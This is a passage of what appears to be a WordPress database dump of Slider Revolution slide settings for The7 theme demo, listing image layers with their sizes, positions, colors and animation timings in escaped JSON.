",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"customCSS\":\"background:linear-gradient(-0deg, rgba(0,0,0,1)45%, rgba(0,0,0,0));\\n\",\"type\":\"shape\",\"version\":\"6.4.0\"}}','{\"0\":\"\",\"version\":\"6.4.0\"}'),
(3,3,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"rgba(0, 0, 0, 0.5)\",\"image\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/bg-blur.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"\"}},\"thumb\":{\"customThumbSrc\":\"\",\"dimension\":\"slider\"},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"36\":{\"text\":\"Image 18\",\"alias\":\"3r-new\",\"uid\":36,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-03-right_18_10_2018.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"907px\",\"e\":true},\"n\":{\"v\":\"907px\"},\"t\":{\"v\":\"907px\"},\"m\":{\"v\":\"907px\"}},\"height\":{\"d\":{\"v\":\"421px\",\"e\":true},\"n\":{\"v\":\"421px\"},\"t\":{\"v\":\"421px\"},\"m\":{\"v\":\"421px\"}},\"originalWidth\":907,\"originalHeight\":421,\"aspectRatio\":{\"d\":{\"v\":2.1543942992874},\"n\":{\"v\":2.1543942992874},\"t\":{\"v\":2.1543942992874},\"m\":{\"v\":2.1543942992874}}},\"position\":{\"x\":{\"d\":{\"v\":\"-251px\",\"e\":true},\"n\":{\"v\":\"-251px\"},\"t\":{\"v\":\"1184px\",\"e\":true},\"m\":{\"v\":\"1184px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-54px\",\"e\":true},\"n\":{\"v\":\"-54px\"},\"t\":{\"v\":\"510px\",\"e\":true},\"m\":{\"v\":\"510px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":7990,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"6\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"38\":{\"text\":\"Image 15\",\"alias\":\"3l-new\",\"uid\":38,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-03-left_18_10_2018.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1244px\",\"e\":true},\"n\":{\"v\":\"1244px\"},\"t\":{\"v\":\"1360px\",\"e\":true},\"m\":{\"v\":\"1360px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"685px\",\"e\":true},\"n\":{\"v\":\"685px\"},\"t\":{\"v\":\"795px\",\"e\":true},\"m\":{\"v\":\"795px\",\"e\":true}},\"originalWidth\":1244,\"originalHeight\":685,\"aspectRatio\":{\"d\":{\"v\":1.8160583941606},\"n\":{\"v\":1.8160583941606},\"t\":{\"v\":1.8160583941606},\"m\":{\"v\":1.8160583941606}}},\"position\":{\"x\":{\"d\":{\"v\":\"-283px\",\"e\":true},\"n\":{\"v\":\"-283px\"},\"t\":{\"v\":\"-318px\",\"e\":true},\"m\":{\"v\":\"-318px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-215px\",\"e\":true},\"n\":{\"v\":\"-215px\"},\"t\":{\"v\":\"355px\",\"e\":true},\"m\":{\"v\":\"355px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":7400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"6\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"40\":{\"text\":\"Image 17\",\"alias\":\"2r-new\",\"uid\":40,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-02-right_18_10_2018.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"801px\",\"e\":true},\"n\":{\"v\":\"801px\"},\"t\":{\"v\":\"917px\",\"e\":true},\"m\":{\"v\":\"917px\"}},\"height\":{\"d\":{\"v\":\"679px\",\"e\":true},\"n\":{\"v\":\"679px\"},\"t\":{\"v\":\"798px\",\"e\":true},\"m\":{\"v\":\"798px\"}},\"originalWidth\":801,\"originalHeight\":679,\"aspectRatio\":{\"d\":{\"v\":1.179675994109},\"n\":{\"v\":1.179675994109},\"t\":{\"v\":1.179675994109},\"m\":{\"v\":1.179675994109}}},\"position\":{\"x\":{\"d\":{\"v\":\"-77px\",\"e\":true},\"n\":{\"v\":\"-77px\"},\"t\":{\"v\":\"-135px\",\"e\":true},\"m\":{\"v\":\"-135px\"}},\"y\":{\"d\":{\"v\":\"-124px\",\"e\":true},\"n\":{\"v\":\"-124px\"},\"t\":{\"v\":\"-193px\",\"e\":true},\"m\":{\"v\":\"-193px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\"}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":450},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":310,\"start\":9000,\"startRelative\":7550,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"4\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"visible\":false,\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"39\":{\"text\":\"Image 14\",\"alias\":\"2l-new\",\"uid\":39,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/art-02-left_18_10_2018.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"644px\",\"e\":true},\"n\":{\"v\":\"644px\"},\"t\":{\"v\":\"738px\",\"e\":true},\"m\":{\"v\":\"738px\"}},\"height\":{\"d\":{\"v\":\"673px\",\"e\":true},\"n\":{\"v\":\"673px\"},\"t\":{\"v\":\"791px\",\"e\":true},\"m\":{\"v\":\"791px\"}},\"originalWidth\":644,\"originalHeight\":673,\"aspectRatio\":{\"d\":{\"v\":0.95690936106984},\"n\":{\"v\":0.95690936106984},\"t\":{\"v\":0.95690936106984},\"m\":{\"v\":0.95690936106984}}},\"position\":{\"x\":{\"d\":{\"v\":\"54px\",\"e\":true},\"n\":{\"v\":\"54px\"},\"t\":{\"v\":\"55px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-11px\",\"e\":true},\"n\":{\"v\":\"-11px\"},\"t\":{\"v\":\"266px\",\"e\":true},\"m\":{\"v\":\"266px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\"}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":450},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim 